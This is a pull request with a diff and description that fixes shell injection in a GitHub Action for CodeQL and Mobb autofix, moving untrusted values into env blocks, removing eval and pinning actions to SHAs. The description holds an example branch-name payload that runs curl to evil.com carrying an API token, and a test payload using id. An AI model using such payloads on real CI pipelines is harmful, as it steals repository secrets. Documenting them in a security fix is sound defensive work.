### PR TITLE
fix: prevent shell injection and pin actions to SHAs [E-1815]

### DIFF
--- a/action.yml
+++ b/action.yml
@@ -23,107 +23,105 @@ outputs:
 runs:
   using: "composite"
   steps:
-    - uses: actions/setup-node@v3.6.0
+    - uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
       with:
         node-version: 18
-        
-    # This step extracts the Head SHA and stores it in the 'head-sha' variable                
-    - id: env 
+
+    - id: env
       name: Set Up Environment
       run: |
-        env
-
         # Getting the head-sha
-        head_sha=${{ github.event.workflow_run.head_sha }}
-        echo "head_sha=$head_sha"
-        echo "head-sha=$head_sha" >> $GITHUB_OUTPUT
-        
+        echo "head_sha=$HEAD_SHA"
+        echo "head-sha=$HEAD_SHA" >> "$GITHUB_OUTPUT"
+
         # Getting the action-run-path
-        RUN_PATH=$GITHUB_SERVER_URL"/"$GITHUB_REPOSITORY"/actions/runs/"$GITHUB_RUN_ID
-        echo RUN_PATH: $RUN_PATH
-        echo "action-run-path=$RUN_PATH" >> $GITHUB_OUTPUT
+        RUN_PATH="$GITHUB_SERVER_URL/$GITHUB_REPOSITORY/actions/runs/$GITHUB_RUN_ID"
+        echo "RUN_PATH: $RUN_PATH"
+        echo "action-run-path=$RUN_PATH" >> "$GITHUB_OUTPUT"
 
-        triggering_event=${{ github.event.workflow_run.event }}
-        head_branch=${{ github.event.workflow_run.head_branch }}
-
-        echo "triggering_event=$triggering_event"
-        echo "head_branch=$head_branch"
+        echo "triggering_event=$TRIGGERING_EVENT"
+        echo "head_branch=$HEAD_BRANCH"
 
         # Initialize variables
         PR_NUMBER=""
         GITHUB_HEAD_REF=""
         IS_COMMIT_RUN=false
 
-        if [[ "$triggering_event" == "pull_request" ]]; then
+        if [[ "$TRIGGERING_EVENT" == "pull_request" ]]; then
           echo "Triggering event is a pull request, extracting PR Number from github.event.pull_request.number"
           PR_NUMBER=$(jq -r '.workflow_run.pull_requests[0].number' "$GITHUB_EVENT_PATH")
-          echo PR_NUMBER: $PR_NUMBER
-          
-          #Getting the head-ref for PR
-          GITHUB_HEAD_REF=$(curl --header 'authorization: Bearer ${{ inputs.github-token }}' -s ${{github.event.workflow_run.repository.url}}/pulls/${PR_NUMBER} | jq -r '.head.ref')
-          echo GITHUB_HEAD_REF: $GITHUB_HEAD_REF
-          
-        elif [[ "$triggering_event" == "dynamic" && $head_branch == refs/pull/* ]]; then
+          echo "PR_NUMBER: $PR_NUMBER"
+
+          # Getting the head-ref for PR
+          GITHUB_HEAD_REF=$(curl --header "authorization: Bearer $GH_TOKEN" -s "$REPO_API_URL/pulls/${PR_NUMBER}" | jq -r '.head.ref')
+          echo "GITHUB_HEAD_REF: $GITHUB_HEAD_REF"
+
+        elif [[ "$TRIGGERING_EVENT" == "dynamic" && "$HEAD_BRANCH" == refs/pull/* ]]; then
           # Extract the PR number from the head_branch
-          echo "Triggering event is a dynamic event, head_branch also contains */pull/* field, extracting PR Number from github.event.workflow_run.head_branch"
-          PR_NUMBER=$(echo $head_branch | cut --delimiter='/' --fields=3 )
-          echo PR_NUMBER: $PR_NUMBER
-          
-          #Getting the head-ref for PR
-          GITHUB_HEAD_REF=$(curl --header 'authorization: Bearer ${{ inputs.github-token }}' -s ${{github.event.workflow_run.repository.url}}/pulls/${PR_NUMBER} | jq -r '.head.ref')
-          echo GITHUB_HEAD_REF: $GITHUB_HEAD_REF
-          
-        elif [[ "$triggering_event" == "push" ]]; then
+          echo "Triggering event is a dynamic event, extracting PR Number from head_branch"
+          PR_NUMBER=$(echo "$HEAD_BRANCH" | cut --delimiter='/' --fields=3)
+          echo "PR_NUMBER: $PR_NUMBER"
+
+          # Getting the head-ref for PR
+          GITHUB_HEAD_REF=$(curl --header "authorization: Bearer $GH_TOKEN" -s "$REPO_API_URL/pulls/${PR_NUMBER}" | jq -r '.head.ref')
+          echo "GITHUB_HEAD_REF: $GITHUB_HEAD_REF"
+
+        elif [[ "$TRIGGERING_EVENT" == "push" ]]; then
           echo "Triggering event is a push/commit, using commit SHA and branch"
           IS_COMMIT_RUN=true
           PR_NUMBER=""
-          
+
           # For push events, use the head_branch directly
-          if [[ "$head_branch" == refs/heads/* ]]; then
-            GITHUB_HEAD_REF=$(echo $head_branch | sed 's/refs\/heads\///')
+          if [[ "$HEAD_BRANCH" == refs/heads/* ]]; then
+            GITHUB_HEAD_REF=$(echo "$HEAD_BRANCH" | sed 's/refs\/heads\///')
           else
-            GITHUB_HEAD_REF=$head_branch
+            GITHUB_HEAD_REF="$HEAD_BRANCH"
           fi
-          echo GITHUB_HEAD_REF: $GITHUB_HEAD_REF
-          
+          echo "GITHUB_HEAD_REF: $GITHUB_HEAD_REF"
+
         else
-          echo "Warning: Triggering event '$triggering_event' is not explicitly handled. Attempting to proceed as commit run."
+          echo "Warning: Triggering event '$TRIGGERING_EVENT' is not explicitly handled. Attempting to proceed as commit run."
           IS_COMMIT_RUN=true
           PR_NUMBER=""
-          
+
           # For other events, try to extract branch from head_branch
-          if [[ "$head_branch" == refs/heads/* ]]; then
-            GITHUB_HEAD_REF=$(echo $head_branch | sed 's/refs\/heads\///')
+          if [[ "$HEAD_BRANCH" == refs/heads/* ]]; then
+            GITHUB_HEAD_REF=$(echo "$HEAD_BRANCH" | sed 's/refs\/heads\///')
           else
-            GITHUB_HEAD_REF=$head_branch
+            GITHUB_HEAD_REF="$HEAD_BRANCH"
           fi
-          echo GITHUB_HEAD_REF: $GITHUB_HEAD_REF
+          echo "GITHUB_HEAD_REF: $GITHUB_HEAD_REF"
         fi
 
-        #Setting outputs
-        echo "pr-number=$PR_NUMBER" >> $GITHUB_OUTPUT
-        echo "github-head-ref=$GITHUB_HEAD_REF" >> $GITHUB_OUTPUT
-        echo "is-commit-run=$IS_COMMIT_RUN" >> $GITHUB_OUTPUT
-        
+        # Setting outputs
+        echo "pr-number=$PR_NUMBER" >> "$GITHUB_OUTPUT"
+        echo "github-head-ref=$GITHUB_HEAD_REF" >> "$GITHUB_OUTPUT"
+        echo "is-commit-run=$IS_COMMIT_RUN" >> "$GITHUB_OUTPUT"
+
         # Log the run type for clarity
         if [[ "$IS_COMMIT_RUN" == "true" ]]; then
-          echo "🔨 Running Mobb analysis for COMMIT on branch: $GITHUB_HEAD_REF"
-          echo "📝 Commit SHA: $head_sha"
+          echo "Running Mobb analysis for COMMIT on branch: $GITHUB_HEAD_REF"
+          echo "Commit SHA: $HEAD_SHA"
         else
-          echo "🔀 Running Mobb analysis for PULL REQUEST #$PR_NUMBER"
-          echo "📝 Branch: $GITHUB_HEAD_REF, SHA: $head_sha"
+          echo "Running Mobb analysis for PULL REQUEST #$PR_NUMBER"
+          echo "Branch: $GITHUB_HEAD_REF, SHA: $HEAD_SHA"
         fi
 
-      shell: bash -l {0}
+      shell: bash
+      env:
+        HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
+        TRIGGERING_EVENT: ${{ github.event.workflow_run.event }}
+        HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
+        GH_TOKEN: ${{ inputs.github-token }}
+        REPO_API_URL: ${{ github.event.workflow_run.repository.url }}
 
     - name: Checkout repository
-      uses: actions/checkout@v3
+      uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
       with:
         ref: ${{ steps.env.outputs.github-head-ref }}
 
-
     # Displays status in the PR that this action is in 'pending' status (PR only)
-    - uses: guibranco/github-status-action-v2@v1.1.13
+    - uses: guibranco/github-status-action-v2@0849440ec82c5fa69b2377725b9b7852a3977e76 # v1.1.13
       if: steps.env.outputs.is-commit-run != 'true'
       with:
         authToken: ${{ inputs.github-token }}
@@ -131,145 +129,158 @@ runs:
         state: "pending"
         target_url: ${{ steps.env.outputs.action-run-path }}
         sha: ${{steps.env.outputs.head-sha}}
-        description: "Mobb fix analysis in progress..." 
+        description: "Mobb fix analysis in progress..."
 
-    
-        
     - id: run-codeql-generate-report
       name: CodeQL Generate Report
-      run: |    
+      run: |
         # Check all available CodeQL analyses
-        URL=$GITHUB_API_URL/repos/$GITHUB_REPOSITORY/code-scanning/analyses
+        URL="$GITHUB_API_URL/repos/$GITHUB_REPOSITORY/code-scanning/analyses"
         echo "analyses list URL=$URL"
-        response=$(curl -H "Authorization: Bearer ${{ inputs.github-token }}" $URL)
-        echo length of code-scanning analyses list=${#response}
+        response=$(curl -H "Authorization: Bearer $GH_TOKEN" "$URL")
+        echo "length of code-scanning analyses list=${#response}"
         echo "analyses list: $response"
-        
+
         # Different filtering logic based on whether this is a PR or commit run
-        if [[ "${{ steps.env.outputs.is-commit-run }}" == "true" ]]; then
-          echo "Filtering CodeQL analyses for commit run - matching SHA: ${{steps.env.outputs.head-sha}}"
+        if [[ "$IS_COMMIT_RUN" == "true" ]]; then
+          echo "Filtering CodeQL analyses for commit run - matching SHA: $HEAD_SHA"
           # For commit runs, filter by commit SHA
-          ids=$(echo "$response" | jq -r --arg sha "${{steps.env.outputs.head-sha}}" '.[] | select((.commit_sha == $sha) and (.tool.name == "CodeQL")) | .id')
+          ids=$(echo "$response" | jq -r --arg sha "$HEAD_SHA" '.[] | select((.commit_sha == $sha) and (.tool.name == "CodeQL")) | .id')
         else
-          echo "Filtering CodeQL analyses for PR run - matching refs/pull/${{ steps.env.outputs.pr-number }}/"
+          echo "Filtering CodeQL analyses for PR run - matching refs/pull/$PR_NUMBER/"
           # For PR runs, filter by PR ref pattern
-          ids=$(echo "$response" | jq -r --arg pr "${{ steps.env.outputs.pr-number }}" '.[] | select((.ref | test("^refs/pull/" + $pr + "/")) and (.tool.name == "CodeQL")) | .id')
+          ids=$(echo "$response" | jq -r --arg pr "$PR_NUMBER" '.[] | select((.ref | test("^refs/pull/" + $pr + "/")) and (.tool.name == "CodeQL")) | .id')
         fi
-  
+
         echo "Matching analyses ids=$ids"
-        
+
         if [ -z "$ids" ]; then
-          if [[ "${{ steps.env.outputs.is-commit-run }}" == "true" ]]; then
-            echo "Error: No matching CodeQL analyses found for commit SHA ${{steps.env.outputs.head-sha}}." >&2
+          if [[ "$IS_COMMIT_RUN" == "true" ]]; then
+            echo "Error: No matching CodeQL analyses found for commit SHA $HEAD_SHA." >&2
           else
-            echo "Error: No matching CodeQL analyses found for PR ${{ steps.env.outputs.pr-number }}." >&2
+            echo "Error: No matching CodeQL analyses found for PR $PR_NUMBER." >&2
           fi
           exit 1
         fi
 
-        echo Initialize sarif_output.json with the base structure
+        echo "Initialize sarif_output.json with the base structure"
         echo '{
           "runs": [],
           "version": "2.1.0"
         }' > sarif_output.json
         cat sarif_output.json
-        
+
         # Loop through each ID
         for id in $ids; do
           echo "Found Analysis ID: $id"
-        
+
           # Fetch the SARIF response
-          sarif_response=$(curl -s -H "Authorization: Bearer ${{ inputs.github-token }}" -H "Accept: application/sarif+json" "$GITHUB_API_URL/repos/$GITHUB_REPOSITORY/code-scanning/analyses/$id")
-          echo length of sarif_response=${#sarif_response}
-          # echo sarif content:
-          # echo $sarif_response | jq '.'
+          sarif_response=$(curl -s -H "Authorization: Bearer $GH_TOKEN" -H "Accept: application/sarif+json" "$GITHUB_API_URL/repos/$GITHUB_REPOSITORY/code-scanning/analyses/$id")
+          echo "length of sarif_response=${#sarif_response}"
 
           # Save the response to a temporary file
           echo "$sarif_response" > current_sarif.json
-          
+
           # Combine the current sarif_output.json with the new SARIF response
           jq -s '{"version": "2.1.0", "runs": (.[0].runs + .[1].runs)}' sarif_output.json current_sarif.json > temp_sarif_output.json
-        
+
           # Move the temporary file to sarif_output.json
           mv temp_sarif_output.json sarif_output.json
-          echo sarif_output.json size=$(stat -c%s sarif_output.json)
+          echo "sarif_output.json size=$(stat -c%s sarif_output.json)"
         done
 
         # Print directory
         ls -l
 
-      shell: bash -l {0}
-    - uses: actions/upload-artifact@v4
+      shell: bash
+      env:
+        GH_TOKEN: ${{ inputs.github-token }}
+        PR_NUMBER: ${{ steps.env.outputs.pr-number }}
+        HEAD_SHA: ${{ steps.env.outputs.head-sha }}
+        IS_COMMIT_RUN: ${{ steps.env.outputs.is-commit-run }}
+
+    - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
       with:
-        # Name of the artifact to upload.
-        # Optional. Default is 'artifact'
         name: CodeQL Sarif Report
         path: sarif_output.json
 
     - id: run-npx-mobb-dev
       name: Mobb - Generate Autofix
       run: |
-      
         REPO=$(git remote get-url origin)
         REPO=${REPO%".git"}
-        SCANNER=codeql
-        GITHUB_SHA=${{steps.env.outputs.head-sha}}
-        PR_NUMBER=${{ steps.env.outputs.pr-number }}
-        GITHUB_HEAD_REF=${{ steps.env.outputs.github-head-ref }}
-        IS_COMMIT_RUN=${{ steps.env.outputs.is-commit-run }}
-        
-        echo "github.event.workflow_run.head_branch = "${{github.event.workflow_run.head_branch}}
-        echo REPO: $REPO
-        echo GITHUB_HEAD_REF: $GITHUB_HEAD_REF
-        echo GITHUB_SHA: $GITHUB_SHA
-        echo PR_NUMBER: $PR_NUMBER
-        echo IS_COMMIT_RUN: $IS_COMMIT_RUN
-        
+
+        echo "REPO: $REPO"
+        echo "GITHUB_HEAD_REF: $MOBB_HEAD_REF"
+        echo "GITHUB_SHA: $MOBB_HEAD_SHA"
+        echo "PR_NUMBER: $MOBB_PR_NUMBER"
+        echo "IS_COMMIT_RUN: $MOBB_IS_COMMIT_RUN"
+
         # Build the Mobb command based on run type
-        if [[ "$IS_COMMIT_RUN" != "true" && -n "$PR_NUMBER" ]]; then
-          echo "Building PR review command for PR #$PR_NUMBER"
-          # For PR runs, use 'review' command with --scanner and --pr parameters
-          MobbExecString="npx --yes mobbdev@latest review -r $REPO --ref $GITHUB_HEAD_REF --ch $GITHUB_SHA --api-key ${{ inputs.mobb-api-token }} -f sarif_output.json --github-token ${{ inputs.github-token }} --scanner $SCANNER --pr $PR_NUMBER"
+        if [[ "$MOBB_IS_COMMIT_RUN" != "true" && -n "$MOBB_PR_NUMBER" ]]; then
+          echo "Building PR review command for PR #$MOBB_PR_NUMBER"
+          MOBB_ARGS=(
+            npx --yes mobbdev@latest review
+            -r "$REPO"
+            --ref "$MOBB_HEAD_REF"
+            --ch "$MOBB_HEAD_SHA"
+            --api-key "$MOBB_API_TOKEN"
+            -f sarif_output.json
+            --github-token "$GH_TOKEN"
+            --scanner codeql
+            --pr "$MOBB_PR_NUMBER"
+          )
         else
           echo "Building commit analyze command - no PR parameters"
-          # For commit runs, use 'analyze' command without --scanner and --pr parameters
-          MobbExecString="npx --yes mobbdev@latest analyze -r $REPO --ref $GITHUB_HEAD_REF --api-key ${{ inputs.mobb-api-token }} -f sarif_output.json --ci"
+          MOBB_ARGS=(
+            npx --yes mobbdev@latest analyze
+            -r "$REPO"
+            --ref "$MOBB_HEAD_REF"
+            --api-key "$MOBB_API_TOKEN"
+            -f sarif_output.json
+            --ci
+          )
         fi
-        
+
         # Check if mobb-project-name exists and append it
-        if [ -n "${{ inputs.mobb-project-name }}" ]; then
-          echo "mobb-project-name specified: ${{ inputs.mobb-project-name }}"
-          MobbExecString+=" --mobb-project-name \"${{ inputs.mobb-project-name }}\""
+        if [ -n "$MOBB_PROJECT_NAME" ]; then
+          echo "mobb-project-name specified: $MOBB_PROJECT_NAME"
+          MOBB_ARGS+=(--mobb-project-name "$MOBB_PROJECT_NAME")
         fi
-        
+
         # Check if organization-id exists and append it
-        if [ -n "${{ inputs.organization-id }}" ]; then
-          echo "organization-id specified: ${{ inputs.organization-id }}"
-          MobbExecString+=" --organization-id \"${{ inputs.organization-id }}\""
+        if [ -n "$MOBB_ORG_ID" ]; then
+          echo "organization-id specified: $MOBB_ORG_ID"
+          MOBB_ARGS+=(--organization-id "$MOBB_ORG_ID")
         fi
-        
-        # Output the final command string for debugging
-        echo "Mobb Command: $MobbExecString"
-        OUT=$(eval $MobbExecString)
-        
+
+        OUT=$("${MOBB_ARGS[@]}")
+
         # Check for errors
         RETVAL=$?
         if [ $RETVAL -ne 0 ]; then
           exit $RETVAL
         fi
-        
+
         # Process the output - extract just the URL from any surrounding status messages
-        OUT=$(echo $OUT | tr '\n' ' ')
+        OUT=$(echo "$OUT" | tr '\n' ' ')
         MOBB_URL=$(echo "$OUT" | grep -oE 'https://[^ ]+' | head -1)
-        echo "fix-report-url=$MOBB_URL" >> $GITHUB_OUTPUT
+        echo "fix-report-url=$MOBB_URL" >> "$GITHUB_OUTPUT"
         echo "Mobb URL: $MOBB_URL"
 
-      shell: bash -l {0}
+      shell: bash
       env:
-        PR_CONTEXT: ${{ toJson(github.event.workflow_run.pull_requests) }}
-        
+        MOBB_HEAD_SHA: ${{ steps.env.outputs.head-sha }}
+        MOBB_PR_NUMBER: ${{ steps.env.outputs.pr-number }}
+        MOBB_HEAD_REF: ${{ steps.env.outputs.github-head-ref }}
+        MOBB_IS_COMMIT_RUN: ${{ steps.env.outputs.is-commit-run }}
+        MOBB_API_TOKEN: ${{ inputs.mobb-api-token }}
+        GH_TOKEN: ${{ inputs.github-token }}
+        MOBB_PROJECT_NAME: ${{ inputs.mobb-project-name }}
+        MOBB_ORG_ID: ${{ inputs.organization-id }}
+
     # Publish the Mobb fix report link in the PR (PR only)
-    - uses: guibranco/github-status-action-v2@v1.1.13
+    - uses: guibranco/github-status-action-v2@0849440ec82c5fa69b2377725b9b7852a3977e76 # v1.1.13
       if: steps.env.outputs.is-commit-run != 'true'
       with:
         authToken: ${{ inputs.github-token }}
@@ -277,11 +288,10 @@ runs:
         state: "success"
         target_url: ${{ steps.run-npx-mobb-dev.outputs.fix-report-url }}
         sha: ${{steps.env.outputs.head-sha}}
-        description: "Click \"Details\" to access the full fix analysis report" 
-
+        description: "Click \"Details\" to access the full fix analysis report"
 
     # Displays status in the PR that this action is in 'complete' status (PR only)
-    - uses: guibranco/github-status-action-v2@v1.1.13
+    - uses: guibranco/github-status-action-v2@0849440ec82c5fa69b2377725b9b7852a3977e76 # v1.1.13
       if: success() && steps.env.outputs.is-commit-run != 'true'
       with:
         authToken: ${{ inputs.github-token }}
@@ -291,9 +301,8 @@ runs:
         sha: ${{steps.env.outputs.head-sha}}
         description: "Mobb fix analysis completed. See comment in the PR for results"
 
-
     # Displays status in the PR that this action is in 'failure' status (PR only)
-    - uses: guibranco/github-status-action-v2@v1.1.13
+    - uses: guibranco/github-status-action-v2@0849440ec82c5fa69b2377725b9b7852a3977e76 # v1.1.13
       if: failure() && steps.env.outputs.is-commit-run != 'true'
       with:
         authToken: ${{ inputs.github-token }}
@@ -301,8 +310,4 @@ runs:
         state: "failure"
         target_url: ${{ steps.env.outputs.action-run-path }}
         sha: ${{steps.env.outputs.head-sha}}
-        description: "Mobb fix analysis failed. Click \"Details\" to see console logs" 
-
-
-
-
+        description: "Mobb fix analysis failed. Click \"Details\" to see console logs"


### PR DESCRIPTION
## Summary

- Prevent command injection (CWE-78) via `${{ github.event.workflow_run.head_branch }}` direct shell interpolation
- Remove `eval` — replace with bash array execution
- Remove `env` command that dumped secrets to workflow logs
- Remove debug `echo` that printed API tokens to logs
- Move all secrets (`mobb-api-token`, `github-token`) from `run:` blocks to `env:` blocks
- Replace `bash -l {0}` with `bash`
- Quote all variable expansions
- Pin all action references to immutable commit SHAs

Preserves all new functionality from recent commits (commit-run support, organization-id input, URL extraction from mobbdev output).

## Security Context

An attacker can create a git branch named `test-$(curl${IFS}evil.com/${MOBB_API_TOKEN})` — this is a valid git branch name. When `${{ github.event.workflow_run.head_branch }}` is used directly in a `run:` block, GitHub template engine pastes the branch name into the shell script before bash runs. Bash then executes the embedded `$(...)` as a command substitution, exfiltrating secrets.

The fix moves all `${{ }}` expressions to `env:` blocks, where values are treated as data (not code) by bash.

## Consumer Impact

**None.** The action `inputs:` and `outputs:` are unchanged. This fix is transparent to all consumers — no workflow changes needed.

## Test plan

- [x] All CI checks pass (CodeQL, Analyze, Mobb Fix Analysis, Mobb Fix Report Link)
- [x] Injection fix verified on the sibling PR mobb-dev/action#31 — a branch named `test-$(id)` was tested and confirmed that `$(id)` is treated as literal text, not executed (same fix pattern applied here)

The injection test evidence is documented in detail at: https://github.com/mobb-dev/action/pull/31#issuecomment-4200140266